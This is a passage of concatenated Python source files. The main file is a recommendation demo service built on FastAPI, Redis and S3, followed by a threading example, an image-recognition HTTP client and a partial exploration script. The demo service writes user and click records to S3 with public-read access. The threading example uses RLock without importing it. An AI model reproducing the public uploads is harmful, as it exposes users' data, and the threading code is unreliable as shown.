current_timestamp = str(calendar.timegm(time.gmtime()))
temp_array = []
temp_array.append(user_id)
temp_array.append(get_random_sex())
temp_array.append(get_random_age())
temp_array.append(current_timestamp)
temp_array.append('anonymous')
connector = '_!_'
s3_body = connector.join(temp_array)
logging.info("store anonymous user data{} ".format(s3_body))
s3client = boto3.resource('s3')
if s3_body != '':
s3client.Bucket(MANDATORY_ENV_VARS['CLICK_RECORD_BUCKET']).put_object(
Key=MANDATORY_ENV_VARS['USER_RECORD_FILE_PATH'] + 'user_' + user_id + '_' + current_timestamp + '.csv', Body=s3_body, ACL='public-read')
return response_success({
"message": "Login as anonymous user!",
"data": {
"userId": user_id,
"visitCount": 1
}
})
user_id_in_sever = get_user_id_by_name(user_name)
logging.info(
'login_post() - user_id_in_sever: {}'.format(user_id_in_sever))
if not user_id_in_sever:
s3_body = ''
current_timestamp = str(calendar.timegm(time.gmtime()))
temp_array = []
temp_array.append(user_id)
temp_array.append(get_random_sex())
temp_array.append(get_random_age())
temp_array.append(current_timestamp)
temp_array.append(user_name)
connector = '_!_'
s3_body = connector.join(temp_array)
logging.info("store anonymous user data{} ".format(s3_body))
s3client = boto3.resource('s3')
if s3_body != '':
s3client.Bucket(MANDATORY_ENV_VARS['CLICK_RECORD_BUCKET']).put_object(
Key=MANDATORY_ENV_VARS['USER_RECORD_FILE_PATH'] + 'user_' + user_id + '_' + current_timestamp + '.csv', Body=s3_body, ACL='public-read')
login_new_user(user_name, user_id)
user_id_in_sever = user_id
visit_count = increase_visit_count(user_name)
response = {
"message": "Login success",
"data": {
"userId": user_id_in_sever,
"visitCount": visit_count
}
}
return response_success(response)
def get_random_sex():
random_sex_list = ['M', 'F']
return random_sex_list[random.randint(0, len(random_sex_list) - 1)]
def get_random_age():
return str(random.randint(15, 60))
@app.get('/api/v1/demo/news', tags=["demo"])
def get_recommend_news(userId: str, type: str, curPage: str, pageSize: str):
logging.info('Start demo->get_recommend_news()...')
logging.info('user_id -> %s', userId)
logging.info('recommend_type -> %s', type)
user_id = userId
recommend_type = type
if user_id == 'magic-uuid':
return mock_news_retrieve_response()
logging.info('recommend news list to user')
# get from retrieve
httpResp = requests.get(MANDATORY_ENV_VARS['RETRIEVE_SERVICE_ENDPOINT'] +
'/api/v1/retrieve/'+user_id+'?recommendType='+recommend_type)
if httpResp.status_code != 200:
return response_failed({
"message": "Not support news type"
}, 400)
news_recommend_list = httpResp.json()['content']
logging.info('new_recommend_list {}'.format(news_recommend_list))
refresh_user_click_data(user_id, news_recommend_list, '1', recommend_type, 'news')
retrieve_response = generate_news_retrieve_response(news_recommend_list)
return retrieve_response
# get user history of click
@app.get('/api/v1/demo/click/{user_id}', tags=["demo"])
def click_get(user_id: str, pageSize: str, curPage: str):
logging.info("click_get enter")
page_size = int(pageSize)
cur_page = int(curPage)
click_list_info = get_user_click_list_info(user_id, page_size, cur_page, 'news')
return response_success({
"message": "click history by user_id: {}".format(user_id),
"totalItems": click_list_info['total_items'],
"curPage": cur_page,
"totalPage": click_list_info['total_page'],
"data": click_list_info['click_list']
})
@app.get('/api/v1/demo/movie/click/{user_id}', tags=["demo"])
def click_get(user_id: str, pageSize: str, curPage: str):
logging.info("click_get enter")
page_size = int(pageSize)
cur_page = int(curPage)
click_list_info = get_user_click_list_info(user_id, page_size, cur_page, 'movie')
return response_success({
"message": "click history by user_id: {}".format(user_id),
"totalItems": click_list_info['total_items'],
"curPage": cur_page,
"totalPage": click_list_info['total_page'],
"data": click_list_info['click_list']
})
@app.post('/api/v1/demo/click', tags=["demo"])
def click_post(clickRequest: ClickRequest):
logging.info("click_post enter")
user_id = clickRequest.userId
item_id = clickRequest.itemId
logging.info("user_id:{}, item_id:{}".format(user_id, item_id))
user_click_count = add_user_click_info(user_id, item_id)
click_one_to_portrait(user_id, item_id)
click_hist_to_recall(user_id, item_id, user_click_count)
return response_success({
"message": "clicked item_id: {}".format(item_id)
})
@app.get('/api/v1/demo/portrait/userid/{user_id}', tags=["demo"])
def portrait_get(user_id: str):
logging.info("portrait_get enter")
logging.info('user_id -> %s', user_id)
httpResp = requests.get(
MANDATORY_ENV_VARS['EVENT_SERVICE_ENDPOINT']+'/api/v1/event/portrait/'+user_id)
if httpResp.status_code != 200:
return response_failed({
"message": "Not support news type"
}, 400)
portrait_data = httpResp.json()['content']
logging.info('portrait_data {}'.format(portrait_data))
return {"message": "success",
"data": portrait_data}
@app.post('/api/v1/demo/url', tags=["demo"])
def url_get(urlRequest: URLRequest):
headers = {
'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/87.0.4280.141 Safari/537.36 Edg/87.0.664.75',
'Host': 'www.baidu.com',
'upgrade-insecure-requests': '0',
'sec-fetch-dest': 'document',
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,'
'application/signed-exchange;v=b3;q=0.9 '
}
title_b64 = urlRequest.title
decoded_bytes = base64.b64decode(title_b64)
title_str = str(decoded_bytes, "utf-8")
logging.info("search: {}".format(title_str))
try:
url = search_by_title(title_str, headers, 10)
except Exception as e1:
logging.error(repr(e1))
url = ''
random_url_list = [
'https://baijiahao.baidu.com/s?id=1690715424093912615&wfr=spider&for=pc',
'https://baijiahao.baidu.com/s?id=1690666081179071313&wfr=spider&for=pc',
'https://baijiahao.baidu.com/s?id=1690689899754648251&wfr=spider&for=pc',
'https://baijiahao.baidu.com/s?id=1690657878159643108&wfr=spider&for=pc',
'https://baijiahao.baidu.com/s?id=1690723015618951721&wfr=spider&for=pc',
'https://baijiahao.baidu.com/s?id=1690633677458149226&wfr=spider&for=pc',
'https://baijiahao.baidu.com/s?id=1690664720265254989&wfr=spider&for=pc',
'https://baijiahao.baidu.com/s?id=1690689899754648251&wfr=spider&for=pc',
'https://baijiahao.baidu.com/s?id=1690665452297691041&wfr=spider&for=pc',
'https://baijiahao.baidu.com/s?id=1690657878159643108&wfr=spider&for=pc',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_10036081365139924887%22%7D'
'&n_type=0&p_from=1',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_9821107029074050546%22%7D'
'&n_type=0&p_from=1',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_9264994315553468968%22%7D'
'&n_type=0&p_from=1',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_10001786768465709073%22%7D'
'&n_type=0&p_from=1',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_9475883012444359813%22%7D'
'&n_type=0&p_from=1',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_9862364227218649344%22%7D'
'&n_type=0&p_from=1',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_9664070672349907696%22%7D'
'&n_type=0&p_from=1',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_9039212282786529445%22%7D'
'&n_type=0&p_from=1',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_9192155174958843101%22%7D'
'&n_type=0&p_from=1',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_9793602629771651632%22%7D'
'&n_type=0&p_from=1',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_9725620345608597043%22%7D'
'&n_type=0&p_from=1',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_9939917266435866080%22%7D'
'&n_type=0&p_from=1'
]
logging.info(f"url: {url}")
if not url:
logging.warning("give a random url")
url = random_url_list[random.randint(0, len(random_url_list) - 1)]
return response_success({
"url": url
})
def search_by_title(title, headers, timeout):
url = "http://www.baidu.com/s"
if len(title) > 32:
title = title[: 32]
logging.info("search_by_title:'{}'".format(title))
params = {"wd": title, "cl": 3, "ie": "utf-8"}
try:
try_count = 0
while try_count < 10:
res = requests.get(url, params=params, headers=headers,
timeout=timeout, allow_redirects=True)
logging.info("res.status_code: {}, try_count:{}, res.text size: {}".format(res.status_code, try_count,
len(res.text)))
soup = BeautifulSoup(res.text, 'html.parser')
try_count = try_count + 1
if is_success_code(res.status_code) and len(soup.text.strip()) > 0:
break
logging.info("now sleep 1 sec ...")
time.sleep(1)
except ConnectTimeout as e:
logging.error(repr(e))
logging.error("request to '{}' timeout".format(url))
return ''
if not is_success_code(res.status_code):
logging.error(
"request fail to www.baidu.com, status_code:{}".format(res.status_code))
return ''
content_left = soup.select("#content_left")
if not content_left:
logging.info("抱歉没有找到 ...")
logging.info("res.text:{}".format(res.text.strip()))
return ""
logging.info("content_left div size={}".format(len(content_left)))
url = ''
try:
content_left_div = content_left[0]
all_links = content_left_div.find_all('a')
url = find_first_link(all_links)
except Exception as e:
logging.error("title:{}".format(title))
logging.error(repr(e))
return url
def find_first_link(the_links):
for link in the_links:
if 'href' in link.attrs:
href = link.attrs['href']
if href.startswith('http://www.baidu.com/link?url='):
return href
def is_success_code(status_code):
return status_code in [200, 201, 202, 203, 204, 205, 206, 209, 210]
def mock_item_detail():
item_detail_data = {
"id": "6552368441838272771",
"title": "Title for mock",
"url": "www.baidu.com"
}
return response_success({
"message": "mock news detail for news_id: {}".format("6552368441838272771"),
"data": item_detail_data
})
@xasync
def init_news_records_data(type, path, file, key):
logging.info('start init_records_data')
p = Pool(1)
new_callback = partial(load_news_records_to_redis, type, key)
p.apply_async(func=download_file_from_s3,
args=(MANDATORY_ENV_VARS['S3_BUCKET'], path,
file, MANDATORY_ENV_VARS['LOCAL_DATA_FOLDER'],),
callback=new_callback)
p.close()
p.join()
@xasync
def init_movie_records_data(type, path, file, key):
logging.info('start init_movie_records_data')
p = Pool(1)
new_callback = partial(load_movie_records_to_redis, type, key)
p.apply_async(func=download_file_from_s3,
args=(MANDATORY_ENV_VARS['S3_BUCKET'], path,
file, MANDATORY_ENV_VARS['LOCAL_DATA_FOLDER'],),
callback=new_callback)
p.close()
p.join()
def load_news_records_to_redis(type, key, file):
try:
file_to_load = open(file, encoding='utf8')
except IOError as error:
raise error
for line in file_to_load:
array = line.strip().split('_!_')
if array[-1] != '':
rCache.load_data_into_hash(key, array[0], json.dumps({
'code': array[1],
'type': array[2],
'title': array[3],
'keywords': array[4],
'url': '-'
}).encode('utf-8'))
file_to_load.close()
logging.info('Load news record... was success.')
def load_movie_records_to_redis(type, key, file):
try:
file_to_load = open(file, encoding='utf8')
except IOError as error:
raise error
for line in file_to_load:
array = line.strip().split('_!_')
if array[-1] != '':
rCache.load_data_into_hash(key, array[0], json.dumps({
'program_type': array[1],
'program_name': array[2],
'release_year': array[3],
'director': array[4],
'actor': array[5],
'category_property': array[6],
'language': array[7],
'ticket_num': array[8],
'score': array[9],
'level': array[10],
'new_series': array[11]
}).encode('utf-8'))
file_to_load.close()
logging.info('Load news record... was success.')
def download_file_from_s3(bucket, path, file, dest_folder):
logging.info('Download file - %s from s3://%s/%s ... ', file, bucket, path)
# Using default session
s3client = boto3.client('s3')
try:
s3client.download_file(bucket, path+file, dest_folder+file)
except botocore.exceptions.ClientError as error:
raise error
except botocore.exceptions.ParamValidationError as error:
raise ValueError(
'The parameters you provided are incorrect: {}'.format(error))
logging.info(
'Download file - %s from s3://%s/%s ... was success', file, bucket, path)
return dest_folder+file
def click_one_to_portrait(user_id, news_id):
url = MANDATORY_ENV_VARS['EVENT_SERVICE_ENDPOINT'] + \
'/api/v1/event/portrait/'+user_id
send_post_request(url, {
'clicked_item': {
'id': news_id
}
})
def click_hist_to_recall(user_id, news_id, user_click_count):
if user_click_count > 0 and user_click_count % TRIGGER_RECALL_WINDOW == 0:
trigger_recall_svc(user_id)
def trigger_recall_svc(user_id):
window = TRIGGER_RECALL_WINDOW
url = MANDATORY_ENV_VARS['EVENT_SERVICE_ENDPOINT'] + \
'/api/v1/event/recall/'+user_id
click_list = get_user_click_hist(user_id, window)
return send_post_request(url, {
'user_id': user_id,
'clicked_item_list': click_list
})
def get_user_click_hist(user_id, top_n):
redis_click_list = get_list_from_redis(
REDIS_KEY_USER_ID_CLICK_DICT, user_id)
logging.info('get user_click_hist {}'.format(redis_click_list))
news_id_list = [item for item in redis_click_list]
news_id_list.reverse()
result = []
for var in news_id_list[0:top_n]:
result.append({"id": var})
return result
def send_post_request(url, data):
logging.info("send POST request to {}".format(url))
logging.info("data: {}".format(data))
if MANDATORY_ENV_VARS['TEST'] == 'True':
return "Test Mode - ok"
headers = {'Content-type': 'application/json'}
r = requests.post(url, data=json.dumps(data), headers=headers)
logging.info("status_code: {}".format(r.status_code))
if r.status_code == 200:
return r.json()
else:
logging.error(r.text)
raise Exception(
"status_code: {}, error POST request {}".format(r.status_code, url))
def add_user_click_info(user_id, news_id):
logging.info("add_user_click_info, user_id: " +
user_id + ", news_id:" + news_id)
click_list = get_list_from_redis(REDIS_KEY_USER_ID_CLICK_DICT, user_id)
click_list.append(news_id)
set_value_to_redis(REDIS_KEY_USER_ID_CLICK_DICT, user_id, click_list)
logging.info("done set click_list to {} for {}, list size: {}".format(
REDIS_KEY_USER_ID_CLICK_DICT, user_id, len(click_list)))
update_item_click_action(user_id, news_id)
return len(click_list)
def get_list_from_redis(dict_name, key):
logging.info("get lsit {}[{}] from redis".format(dict_name, key))
list_bin = rCache.get_data_from_hash(dict_name, key)
if list_bin:
list_values = json.loads(binary_to_str(list_bin))
else:
list_values = []
logging.info("return {} items".format(len(list_values)))
return list_values
def update_item_click_action(user_id, news_id):
'''
field -> user_id_action_dict
key -> user_id
value -> [
{
news_id : 0
},
{
news_id : 1
}
]
'''
logging.info("update_item_click_action {}[{}] '{}' = 1".format(
user_id_action_dict, user_id, news_id))
user_action = get_list_from_redis(user_id_action_dict, user_id)
click_data = user_action['click_data']
existed_id_flag = 0
for item in click_data:
if news_id in item:
item[str(news_id)] = "1"
existed_id_flag = 1
break
if existed_id_flag == 0:
user_action['click_data'].append({news_id: '1'})
logging.info('after user_action update: {}'.format(user_action))
set_value_to_redis(user_id_action_dict, user_id, user_action)
def get_user_click_list_info(user_id, page_size, cur_page, scenario):
redis_click_list = get_list_from_redis(
REDIS_KEY_USER_ID_CLICK_DICT, user_id)
logging.info('redis_click_list: {}'.format(redis_click_list))
item_id_list_all = redis_click_list
item_id_list_all.reverse()
total_items = len(item_id_list_all)
total_page = math.ceil(total_items / int(page_size))
from_index = page_size * cur_page
to_index = page_size * (cur_page + 1)
page_item_id = item_id_list_all[from_index:to_index]
click_list = []
if scenario == 'news':
click_list = [get_item_by_id(news_id) for news_id in page_item_id]
elif scenario == 'movie':
click_list = [get_movie_by_id(movie_id) for movie_id in page_item_id]
else:
logging.info("scenario {} is not supported!")
logging.info(
"get_user_click_list_info return click_list size: {}".format(len(click_list)))
return {
"click_list": click_list,
"total_items": total_items,
"total_page": total_page
}
def get_item_by_id(item_id):
logging.info("get_item_by_id start")
news_detail_record = json.loads(rCache.get_data_from_hash(
news_records_dict, item_id), encoding='utf-8')
logging.info('news id {} news_detail_record {}'.format(
item_id, news_detail_record))
return {
'id': item_id,
'title': news_detail_record['title'],
'url': 'www.baidu.com' # TODO
}
def get_movie_by_id(item_id):
logging.info("get_movie_by_id start")
movie_detail_record = json.loads(rCache.get_data_from_hash(
movie_records_dict, item_id), encoding='utf-8')
logging.info('movie id {} movie_detail_record {}'.format(item_id, movie_detail_record))
s3_bucket = MANDATORY_ENV_VARS['S3_BUCKET']
s3_prefix = MANDATORY_ENV_VARS['S3_PREFIX']
aws_region = MANDATORY_ENV_VARS['AWS_REGION']
return {
'id': item_id,
'image': 'https://{}.s3-{}.amazonaws.com/{}/movielens-posters/img/{}.jpg'.format(s3_bucket, aws_region, s3_prefix, item_id),
'title': movie_detail_record['program_name'],
'release_year': movie_detail_record['release_year'],
'director': movie_detail_record['director'],
'actor': movie_detail_record['actor'],
'category_property': movie_detail_record['category_property'],
'new_series': movie_detail_record['new_series'],
'level': movie_detail_record['level'],
'desc': '{}'.format(item_id),
'type': movie_detail_record['program_type']
}
def get_item_detail_response(news_id):
logging.info("get_item_detail_response start")
news_detail_record = json.loads(rCache.get_data_from_hash(
news_records_dict, news_id), encoding='utf-8')
logging.info('news id {} news_detail_record {}'.format(
news_id, news_detail_record))
data = {
'id': news_id,
'title': news_detail_record['title'],
'url': 'www.baidu.com'
}
return response_success({
"message": "news {} detail success".format(news_id),
"data": data
})
def generate_news_retrieve_response(new_recommend_list):
retrieve_data = []
for element in new_recommend_list:
news_detail_record = json.loads(rCache.get_data_from_hash(
news_records_dict, element['id']), encoding='utf-8')
logging.info('news id {} news_detail_record {}'.format(
element['id'], news_detail_record))
data = {
'id': element['id'],
'image': 'https://inews.gtimg.com/newsapp_bt/0/13060844390/1000', # TODO
'title': news_detail_record['title'],
'desc': '{}'.format(element['id']), # TODO
'type': news_detail_record['type'],
'tag': element['tags']
}
retrieve_data.append(data)
return response_success({
"message": "retrieve news list success",
"totalItems": len(new_recommend_list),
"curPage": 0,
"totalPage": 1,
"data": retrieve_data
})
def generate_movie_retrieve_response(movie_recommend_list):
retrieve_data = []
s3_bucket = MANDATORY_ENV_VARS['S3_BUCKET']
s3_prefix = MANDATORY_ENV_VARS['S3_PREFIX']
aws_region = MANDATORY_ENV_VARS['AWS_REGION']
for element in movie_recommend_list:
movie_detail_record = json.loads(rCache.get_data_from_hash(
movie_records_dict, element['id']), encoding='utf-8')
logging.info('movie id {} movie_detail_record {}'.format(
element['id'], movie_detail_record))
data = {
'id': element['id'],
'image': 'https://{}.s3-{}.amazonaws.com/{}/movielens-posters/img/{}.jpg'.format(s3_bucket, aws_region, s3_prefix, element['id']),
'title': movie_detail_record['program_name'],
'release_year': movie_detail_record['release_year'],
'director': movie_detail_record['director'],
'actor': movie_detail_record['actor'],
'category_property': movie_detail_record['category_property'],
'new_series': movie_detail_record['new_series'],
'level': movie_detail_record['level'],
'desc': '{}'.format(element['id']),
'type': movie_detail_record['program_type'],
'tag': element['tags']
}
retrieve_data.append(data)
return response_success({
"message": "retrieve news list success",
"totalItems": len(movie_recommend_list),
"curPage": 0,
"totalPage": 1,
"data": retrieve_data
})
def refresh_user_click_data(user_id, items_recommend_list, action_type, action_source, scenario):
logging.info('refresh_user_click_data start')
store_previous_click_data(user_id, action_type, scenario)
new_click_data = generate_new_click_data(
items_recommend_list, action_source)
if rCache.load_data_into_hash(user_id_action_dict, user_id, json.dumps(new_click_data).encode('utf-8')):
logging.info(
'Save user_id_action_dict into Redis with key : %s ', user_id)
logging.info('refresh_user_click_data completed')
def response_failed(body, code):
return JSONResponse(status_code=code, content=body)
def mock_news_retrieve_response():
retrieve_data = []
count = 0
while (count < 20):
retrieve_data.append(get_item_by_id("6552368441838272771"))
count = count + 1
return response_success({
"message": "mock retrieve news list",
"totalItems": 100,
"curPage": 0,
"totalPage": 1,
"data": retrieve_data
})
def mock_movie_retrieve_response():
retrieve_data = []
count = 0
while (count < 20):
retrieve_data.append(get_item_by_id("movie test id"))
count = count + 1
return response_success({
"message": "mock retrieve movie list",
"totalItems": 100,
"curPage": 0,
"totalPage": 1,
"data": retrieve_data
})
def generate_new_click_data(items_recommend_list, action_source):
new_click_data = []
for element in items_recommend_list:
new_click_data.append({element['id']: '0'})
final_click_data = {
'click_data': new_click_data,
'action_source': action_source
}
logging.info(
'generate_new_click_data completed {}'.format(final_click_data))
return final_click_data
def store_previous_click_data(user_id, action_type, scenario):
logging.info('store_previous_click_data start')
user_id_click_data_redis = rCache.get_data_from_hash(
user_id_action_dict, user_id)
if not bool(user_id_click_data_redis):
return
user_id_click_data = json.loads(user_id_click_data_redis, encoding='utf-8')
logging.info('previous click data {}'.format(user_id_click_data))
action_source = user_id_click_data['action_source']
click_data = user_id_click_data['click_data']
logging.info('previous click data action_source {}'.format(action_source))
current_timestamp = str(calendar.timegm(time.gmtime()))
s3_body = ''
connector = '_!_'
action_source_code = '0'
for element in click_data:
temp_array = []
# k is item id, v is action 0/1
for k, v in element.items():
temp_array.append(user_id)
temp_array.append(k)
temp_array.append(current_timestamp)
temp_array.append(action_type)
temp_array.append(v)
if action_source_code == '0':
action_source_code = get_action_source_code(action_source, k, scenario)
temp_array.append(action_source_code)
s3_body = s3_body + connector.join(temp_array) + '\n'
logging.info("store_previous_click_data data{} ".format(s3_body))
s3client = boto3.resource('s3')
if s3_body != '':
s3client.Bucket(MANDATORY_ENV_VARS['CLICK_RECORD_BUCKET']).put_object(
Key=MANDATORY_ENV_VARS['CLICK_RECORD_FILE_PATH'] + 'action_' + user_id + '_' + current_timestamp + '.csv', Body=s3_body, ACL='public-read')
logging.info('store_previous_click_data completed')
def get_action_source_code(action_source, item_id, scenario):
if action_source == 'recommend':
return '1'
else:
if scenario == 'news':
news_detail_record = json.loads(rCache.get_data_from_hash(
news_records_dict, item_id), encoding='utf-8')
logging.info('get item detail {}'.format(news_detail_record))
# e.g. 106, 107..
return news_detail_record['code']
else:
# e.g. 'action' or 'crime', movie type
return action_source
def get_user_id_by_name(user_name):
user_info_dict = get_dict_from_redis(REDIS_KEY_USER_LOGIN_DICT, user_name)
if user_info_dict:
return user_info_dict['user_id']
logging.info("Cannot find user_id by name: {}".format(user_name))
return ''
def login_new_user(user_name, user_id):
set_value_to_redis(REDIS_KEY_USER_LOGIN_DICT, user_name, {
"user_id": user_id,
"visit_count": 0,
"click_count": 0
})
def increase_visit_count(user_name):
user_info_dict = get_dict_from_redis(REDIS_KEY_USER_LOGIN_DICT, user_name)
new_count = user_info_dict['visit_count'] + 1
user_info_dict['visit_count'] = new_count
set_value_to_redis(REDIS_KEY_USER_LOGIN_DICT, user_name, user_info_dict)
logging.info("user_name:{}, visit_count: {}".format(user_name, new_count))
return new_count
def set_value_to_redis(dict_name, key, value):
rCache.load_data_into_hash(dict_name, key, json.dumps(value))
def get_dict_from_redis(dict_name, key):
logging.info("get dict {}[{}] from redis".format(dict_name, key))
val_bin = rCache.get_data_from_hash(dict_name, key)
if val_bin:
val_dict = json.loads(binary_to_str(val_bin))
else:
val_dict = {}
logging.info("return {}".format(len(val_dict)))
return val_dict
def response_success(body):
return body
def binary_to_str(bin_str):
return bin_str.decode('utf-8')
# movie
@app.get('/api/v1/demo/movie', tags=["demo"])
def get_recommend_movie(userId: str, type: str, curPage: str, pageSize: str):
logging.info('Start demo->get_recommend_movie()...')
logging.info('user_id -> %s', userId)
logging.info('recommend_type -> %s', type)
user_id = userId
recommend_type = type
if user_id == 'magic-uuid':
return mock_news_retrieve_response()
logging.info('recommend movie list to user')
# get from retrieve
httpResp = requests.get(MANDATORY_ENV_VARS['RETRIEVE_SERVICE_ENDPOINT'] +
'/api/v1/retrieve/'+user_id+'?recommendType='+recommend_type)
if httpResp.status_code != 200:
return response_failed({
"message": "Not support news type"
}, 400)
movie_recommend_list = httpResp.json()['content']
logging.info('movie_recommend_list {}'.format(movie_recommend_list))
refresh_user_click_data(user_id, movie_recommend_list, '1', recommend_type, 'movie')
retrieve_response = generate_movie_retrieve_response(movie_recommend_list)
return retrieve_response
@app.post('/api/v1/demo/start_train', tags=["demo"])
def start_train_post(trainReq: TrainRequest):
logging.info('demo start_train_post start! change type: {}'.format(
trainReq.change_type))
if trainReq.change_type not in ['MODEL', 'CONTENT', 'ACTION']:
raise HTTPException(status_code=405, detail="invalid change_type")
url = MANDATORY_ENV_VARS['EVENT_SERVICE_ENDPOINT'] + \
'/api/v1/event/start_train'
result = send_post_request(url, {
'change_type': trainReq.change_type
})
logging.info('executionArn: {}'.format(result['executionArn']))
response = {
"message": "Start train success",
"data": result
}
return response
@app.get('/api/v1/demo/offline_status/{executionArn}', tags=["demo"])
def offline_status(executionArn: str):
logging.info("offline_status start, executionArn {}".format(executionArn))
httpResp = requests.get(
MANDATORY_ENV_VARS['EVENT_SERVICE_ENDPOINT']+'/api/v1/event/offline_status/'+executionArn)
if httpResp.status_code != 200:
return response_failed({
"message": "Error"
}, 400)
result = httpResp.json()['status']
logging.info('result {}'.format(result))
return result
def init():
# Check out environments
for var in MANDATORY_ENV_VARS:
if var not in os.environ:
logging.error(
"Mandatory variable {%s} is not set, using default value {%s}.", var, MANDATORY_ENV_VARS[var])
else:
MANDATORY_ENV_VARS[var] = os.environ.get(var)
# Initial redis connection
global rCache
rCache = cache.RedisCache(
host=MANDATORY_ENV_VARS['REDIS_HOST'], port=MANDATORY_ENV_VARS['REDIS_PORT'])
logging.info('redis status is {}'.format(rCache.connection_status()))
logging.info('demo service start')
if __name__ == "__main__":
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
init()
uvicorn.run(app, host="0.0.0.0", port=MANDATORY_ENV_VARS['DEMO_PORT'])
|
thread_queue.py
|
#线程间通信
import time
import threading
import variables # 不能用from variables import detail_url_list 因为这样会导致一个线程的修改其他线程看不到
from threading import Condition
#1. 生产者当生产10个url以后就就等待,保证detail_url_list中最多只有十个url
#2. 当url_list为空的时候,消费者就暂停
def get_detail_html(lock):
#爬取文章详情页
detail_url_list = variables.detail_url_list
while True:
if len(variables.detail_url_list):
lock.acquire()
if len(detail_url_list):
url = detail_url_list.pop() # 直接用共享变量并不是线程安全的方式
lock.release()
# for url in detail_url_list:
print("get detail html started")
time.sleep(2)
print("get detail html end")
else:
lock.release()
time.sleep(1)
def get_detail_url(lock):
# 爬取文章列表页
detail_url_list = variables.detail_url_list
while True:
print("get detail url started")
time.sleep(4)
for i in range(20):
lock.acquire()
if len(detail_url_list) >= 10:
lock.release()
time.sleep(1)
else:
detail_url_list.append("http://projectsedu.com/{id}".format(id=i))
lock.release()
print("get detail url end")
#1. 线程通信方式- 共享变量
if __name__ == "__main__":
lock = RLock()
thread_detail_url = threading.Thread(target=get_detail_url, args=(lock,))
for i in range(10):
html_thread = threading.Thread(target=get_detail_html, args=(lock,))
html_thread.start()
# # thread2 = GetDetailUrl("get_detail_url")
start_time = time.time()
# thread_detail_url.start()
# thread_detail_url1.start()
#
# thread1.join()
# thread2.join()
#当主线程退出的时候, 子线程kill掉
print ("last time: {}".format(time.time()-start_time))
|
pipeline_http_client.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# from paddle_serving_server.pipeline import PipelineClient
import numpy as np
import requests
import json
import cv2
import base64
import os
from time import *
import threading
def demo(url,data,i):
begin_time = time()
r = requests.post(url=url, data=json.dumps(data))
end_time = time()
run_time = end_time-begin_time
print ('线程 %d 时间 %f '%(i,run_time))
print(r.json())
def cv2_to_base64(image):
return base64.b64encode(image).decode('utf8')
url = "http://127.0.0.1:9315/recognition/prediction"
with open(os.path.join(".", "test.jpg"), 'rb') as file:
image_data1 = file.read()
image = cv2_to_base64(image_data1)
for i in range(1):
print(i)
data = {"key": ["image"], "value": [image]}
r = requests.post(url=url, data=json.dumps(data))
print(r.json())
#t = threading.Thread(target=demo, args=(url,data,i,))
#t.start()
|
random_explore.py
|
import json
import time
import os
import random
import multiprocessing
import numpy as np
import tensorflow as tf
import nsm
from nsm import data_utils
from nsm import env_factory
from nsm import graph_factory
from nsm import model_factory
from nsm import agent_factory
from nsm import executor_factory
from nsm import computer_factory
import utils
# FLAGS
FLAGS = tf.app.flags.FLAGS
# Experiment name
tf.flags.DEFINE_string('output_dir', '', 'output directory')
tf.flags.DEFINE_string('experiment_name', 'experiment',
'All outputs of this experiment is'
' saved under a folder with the same name.')
tf.app.flags.DEFINE_integer(
'n_epoch', 1000, 'Max number of valid tokens during decoding.')
# Data
tf.app.flags.DEFINE_string(
'table_file', '', '.')
tf.app.flags.DEFINE_string(
'train_file_tmpl', '', 'Path to the file of training examples, a jsonl file.')
# Model
## Computer
tf.app.flags.DEFINE_integer(
'max_n_mem', 100, 'Max number of memory slots in the "computer".')
tf.app.flags.DEFINE_integer(
'max_n_exp', 3, 'Max number of expressions allowed in a program.')
tf.app.flags.DEFINE_integer(
'max_n_valid_indices', 100, 'Max number of valid tokens during decoding.')
tf.app.flags.DEFINE_string(
'executor', 'wtq', 'Which executor to use, wtq or wikisql.')
# Exploration
tf.app.flags.DEFINE_integer(
'n_explore_samples', 50, '.')
tf.app.flags.DEFINE_integer('save_every_n', 10, '.')
tf.app.flags.DEFINE_integer('id_start', 0, '.')
tf.app.flags.DEFINE_integer('id_end', 0, '.')
tf.app.flags.DEFINE_string(
'trigger_word_file', '', '.')
tf.app.flags.DEFINE_integer('n_process', -1, '.')
tf.logging.set_verbosity(tf.logging.INFO)
def get_experiment_dir():
experiment_dir = os.path.join(FLAGS.output_dir, FLAGS.experiment_name)
return experiment_dir
def random_explore(env, use_cache=True, trigger_dict=None):
env = env.clone()
env.use_cache = use_cache
question_tokens = env.question_annotation['tokens']
if 'pos_tag' in env.question_annotation:
question_tokens += env.question_annotation['pos_tags']
invalid_functions = []
if trigger_dict is not None:
for function, trigger_words in trigger_dict.iteritems():
for w in trigger_words:
if w in question_tokens:
break
else:
invalid_functions.append(function)
ob = env.start_ob
while not env.done:
invalid_actions = env.de_vocab.lookup(invalid_functions)
valid_actions = ob[0].valid_indices
new_valid_actions = list(set(valid_actions) - set(invalid_actions))
# No action available anymore.
if len(new_valid_actions) <= 0:
return None
new_action = np.random.randint(0, len(new_valid_actions))
action = valid_actions.index(new_valid_actions[new_action])
